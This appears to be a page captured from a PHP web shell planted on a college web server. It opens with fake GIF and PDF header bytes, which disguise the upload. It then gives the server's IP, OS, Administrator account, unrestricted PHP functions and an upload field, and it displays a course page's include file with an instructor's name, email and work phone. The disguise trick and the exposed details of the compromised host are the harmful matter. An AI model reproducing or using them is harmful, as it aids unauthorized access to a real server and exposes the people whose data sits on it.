GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/AllenBenusa/ |
Upload File : |
<? // AllenBenusa/ContactInformation.phpinc // Display the Instructor contact information. // You can set any key/value and it will display in your contact information list. Only 'Instructor', 'Email address' and 'Weekly schedule' are preset for use. // They will be displayed in the order you create them with the exception of 'Weekly schedule'. // The format for creating $InstructorInformation key/values is: $InstructorInformation['Contact display text'] = 'Contact information'; // 'Instructor' is used for the alt attribute of your 'Weekly schedule' image. // 'Email address' is used to generate an email link. // 'Weekly schedule' is displayed with a header line and is at the bottom of the contact information $InstructorInformation = array(); $InstructorInformation['Instructor'] = 'Allen Benusa'; $InstructorInformation['Image'] = '<img src="/images/AllenBenusa100.jpg" width="100" height="144" alt="Allen Benusa" />'; $InstructorInformation['Email address'] = 'Allen.Benusa@ridgewater.edu'; $InstructorInformation['Work number'] = '320-234-8547 <span class="note">This number does not accept text messages.</span>'; include('common/ContactInformation.phpinc');